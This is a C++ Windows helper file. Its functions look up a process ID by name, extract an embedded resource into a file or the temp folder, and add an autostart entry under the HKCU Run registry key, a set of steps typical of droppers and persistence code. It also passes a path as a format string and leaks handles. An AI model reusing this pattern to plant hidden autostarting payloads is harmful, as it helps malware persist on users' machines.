
#include "common.h"




BOOL getDllPathName(LPWSTR dllPathName, DWORD dllPathNameLength, LPWSTR dllFileName)
{
	BOOL bFound = FALSE;
	DWORD processId;
	MODULEENTRY32 me;
	LPWSTR ptr;
	HANDLE hSnapshot = INVALID_HANDLE_VALUE;
	processId = GetCurrentProcessId();

	if ((hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, processId))!= INVALID_HANDLE_VALUE)
	{
		me.dwSize = sizeof(MODULEENTRY32);
		if (Module32First(hSnapshot, &me))
		{
			do
			{
				if (_wcsicmp(me.szModule, dllFileName)==0||
					_wcsicmp(me.szExePath, dllFileName)==0)
				{
					_snwprintf(dllPathName, dllPathNameLength, me.szExePath); 
					if ((ptr = wcsrchr(dllPathName, '\\'))!= NULL)
					{
						ptr ++;
						*ptr = L'\0';
					}
					bFound = TRUE;
					break;
				}
			}
			while (Module32Next(hSnapshot, &me));
		}
	}
	return bFound;
}


BOOL GetProcessId(DWORD& dwProcessId, LPWSTR processFileName) 
{ 
    HANDLE         hProcessSnap = NULL; 
    BOOL           bRet      = FALSE; 
    PROCESSENTRY32 pe32      = {0}; 
 
    if ((hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)) != INVALID_HANDLE_VALUE)
	{
		pe32.dwSize = sizeof(PROCESSENTRY32); 
 
		if (Process32First(hProcessSnap, &pe32)) 
		{  
			do 
			{ 
				if (_wcsicmp(pe32.szExeFile, processFileName) == 0)
				{
					dwProcessId = pe32.th32ProcessID;
					bRet = TRUE;
				}
			} 
			while (Process32Next(hProcessSnap, &pe32)); 
		}
		CloseHandle (hProcessSnap); 
	}
	return bRet; 
} 


BOOL loadMyResource(HINSTANCE hInstance, LPWSTR resTypeName, WORD resourceId, LPVOID& pRes, DWORD& resSize)
{
	BOOL  bRes = FALSE;
	HRSRC hResInfo = NULL;
	HGLOBAL hResHandle = NULL;	
	

	if ((hResInfo=FindResourceEx(hInstance, resTypeName, MAKEINTRESOURCE(resourceId), 
		MAKELANGID(LANG_NEUTRAL, SUBLANG_NEUTRAL)))!= NULL)
	{
		if ((hResHandle = LoadResource(hInstance, hResInfo))!= NULL)
		{
			if ((resSize = SizeofResource(hInstance, hResInfo))!= 0)
			{
				if ((pRes = LockResource(hResHandle))!= NULL)
				{
					bRes = TRUE;				
				}
			}
		}
	}
	return bRes;
}

BOOL createFileFromImage(LPWSTR myFileName, LPVOID pRes, DWORD resSize)
{
	BOOL bRes = FALSE;
	DWORD bytesWritten = 0;
	HANDLE hFile = INVALID_HANDLE_VALUE;
	
	if ((hFile = CreateFile(myFileName, GENERIC_WRITE, FILE_SHARE_DELETE, NULL, 
						CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL))!= INVALID_HANDLE_VALUE)
	{
		if (WriteFile(hFile, pRes, resSize, &bytesWritten, NULL) && bytesWritten == resSize)
		{
			CloseHandle(hFile);	
			bRes = TRUE;	
		}							
	}		
	return bRes;
}


BOOL createTempFileFromImage(LPWSTR myFileName, LPWSTR szFileName, LPVOID pRes, DWORD resSize)
{
	BOOL bRes = FALSE;
	DWORD bytesWritten = 0;
	HANDLE hFile = INVALID_HANDLE_VALUE;
	if (GetTempPath(MY_MAX_PATH, szFileName))
	{
		wcscat(szFileName, myFileName);
		
		if ((hFile = CreateFile(szFileName, GENERIC_WRITE, FILE_SHARE_DELETE, NULL, 
							CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL))!= INVALID_HANDLE_VALUE)
		{
			if (WriteFile(hFile, pRes, resSize, &bytesWritten, NULL) && bytesWritten == resSize)
			{
				CloseHandle(hFile);	
				bRes = TRUE;
		
			}
								
		}		
	}
	return bRes;
}


BOOL setRunRegKey(LPCTSTR keyName, LPWSTR targetProcessName)
{
	HKEY    hKey;
	TCHAR processName[MAX_PATH*4];
	if (targetProcessName == NULL)
	{
		if (!GetModuleFileName(NULL, processName, MAX_PATH * 4))
		{
			return FALSE;
		}
		targetProcessName = processName;
	}
    if(RegOpenKeyEx(HKEY_CURRENT_USER, _T("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"), 0, 
		KEY_ALL_ACCESS, &hKey) != ERROR_SUCCESS){
		return FALSE;
	}
    if(RegSetValueEx (hKey, keyName, 0L, REG_SZ, (LPBYTE) targetProcessName, (wcslen(targetProcessName) + 1) * sizeof(TCHAR)) 
		!= ERROR_SUCCESS)
	{ 
		RegCloseKey(hKey);
		return FALSE;
	}
	RegCloseKey(hKey);
	return TRUE;
}